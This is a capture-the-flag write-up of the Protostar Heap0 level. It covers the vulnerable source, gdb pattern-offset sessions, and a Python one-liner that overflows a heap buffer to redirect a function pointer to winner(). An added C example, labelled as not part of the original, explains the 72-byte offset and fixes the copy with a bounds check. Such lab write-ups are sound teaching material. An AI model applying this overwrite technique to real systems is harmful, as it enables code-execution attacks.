Protostar Heap0 – Writeup

Now for Heap Overflow Level 0. I think it is similar to a stack-based overflow.

Description

This level introduces heap overflows and how they can influence code flow.

This level is at /opt/protostar/bin/heap0

Heap0.c

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];
};

struct fp {
  int (*fp)();
};

void winner()
{
  printf("level passed\n");
}

void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);
  
  f->fp();

}

Let’s check the process.

[email protected]:/opt/protostar/bin$ ./heap0 AAAAAAAAAAAAAAAAAA
data is at 0x804a008, fp is at 0x804a050
level has not been passed

Now use the pattern tool to find the offset at which the overflowing copy reaches the function pointer.

[email protected]:/opt/protostar/bin$ gdb ./heap0
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/heap0...done.
(gdb) run
Starting program: /opt/protostar/bin/heap0 
data is at 0x804a008, fp is at 0x804a050

Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x804a008 "", src=0x0) at strcpy.c:39
39	strcpy.c: No such file or directory.
	in strcpy.c
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap0 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
data is at 0x804a008, fp is at 0x804a050

Program received signal SIGSEGV, Segmentation fault.
0x41346341 in ?? ()

The crash address 0x41346341 gives an offset of 72.

┌─[[email protected]]─[~/Downloads/pattern-master]
└──> ./pattern offset 0x41346341
72

We need the call to go to the right function, winner. I use print winner in gdb to get its address.

(gdb) print winner
$1 = {void (void)} 0x8048464 <winner>

Final exploit!

[email protected]:/opt/protostar/bin$ ./heap0 $(python -c 'print "A"*72+"\x64\x84\x04\x08"')
data is at 0x804a008, fp is at 0x804a050
level passed
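The two addresses the level prints explain the offset: 0x804a050 - 0x804a008 = 0x48 = 72, which is the 64-byte name array plus the 8 bytes of malloc chunk metadata that sit between the two allocations on this 32-bit glibc, so the 73rd byte of argv[1] lands on f->fp. The program below is an added example, not part of the original writeup or of Protostar: it reproduces the level's two structures and allocation order, computes that distance from the printed addresses, and replaces the unbounded strcpy with a copy that rejects anything that would not fit in name, so the function pointer in the neighbouring chunk can no longer be overwritten. The filler() helper and the 76-byte constructed input are assumptions of this example, not values from the page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Same structures as the level: a 64-byte name followed on the heap by a
   function pointer in the next malloc chunk. */
struct data { char name[64]; };
struct fp   { int (*fp)(void); };

int winner(void)   { puts("level passed"); return 1; }
int nowinner(void) { puts("level has not been passed"); return 0; }

/* Distance between the two chunks printed by the level (data at 0x804a008,
   fp at 0x804a050 on the page). On 32-bit glibc malloc(64) yields a 72-byte
   chunk (64 + 4-byte size field, rounded up to 8), so fp sits 72 bytes past
   the start of name: exactly the offset the pattern tool reported. */
long chunk_distance(uintptr_t data_addr, uintptr_t fp_addr)
{
    return (long)(fp_addr - data_addr);
}

/* Bounds-checked replacement for strcpy(d->name, argv[1]): refuse any input
   that does not fit (including the terminating NUL) instead of writing past
   the end of name into the next chunk. Returns 0 on success, -1 if rejected. */
int copy_name(struct data *d, const char *src)
{
    size_t n = strlen(src);
    if (n >= sizeof d->name)
        return -1;                /* would overflow into the fp chunk */
    memcpy(d->name, src, n + 1);  /* n bytes plus the NUL */
    return 0;
}

/* Copy src into a fresh struct data and report the stored length, or -1 if
   the copy was rejected. */
int stored_length(const char *src)
{
    struct data d;
    if (copy_name(&d, src) != 0)
        return -1;
    return (int)strlen(d.name);
}

/* Constructed test input: len bytes of 'A' (the page's exploit used 72). */
const char *filler(size_t len)
{
    static char buf[256];
    if (len >= sizeof buf)
        len = sizeof buf - 1;
    memset(buf, 'A', len);
    buf[len] = '\0';
    return buf;
}

/* The level's allocation sequence with the checked copy in place. Returns
   whatever f->fp() returns: 0 means nowinner ran, i.e. fp was untouched. */
int run_level(const char *input)
{
    struct data *d = malloc(sizeof *d);
    struct fp   *f = malloc(sizeof *f);
    if (!d || !f) { free(d); free(f); return -1; }
    d->name[0] = '\0';
    f->fp = nowinner;
    if (copy_name(d, input) != 0)
        fprintf(stderr, "input of %zu bytes rejected (limit %zu)\n",
                strlen(input), sizeof d->name - 1);
    int r = f->fp();
    free(f);
    free(d);
    return r;
}

int main(int argc, char **argv)
{
    printf("offset between the level's chunks: %ld\n",
           chunk_distance(0x804a008u, 0x804a050u));
    /* With the check in place, even the 76-byte payload shape from the
       writeup (72 filler bytes + 4-byte address) never reaches f->fp. */
    run_level(argc > 1 ? argv[1] : filler(76));
    return 0;
}
```

Rejecting over-long input rather than truncating it with strncpy is deliberate: a silently truncated name hides the fault, whereas a rejected one is visible in the log and leaves f->fp exactly as it was initialised.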

Bagno! Level passed. Thanks for reading. Happy Hacking.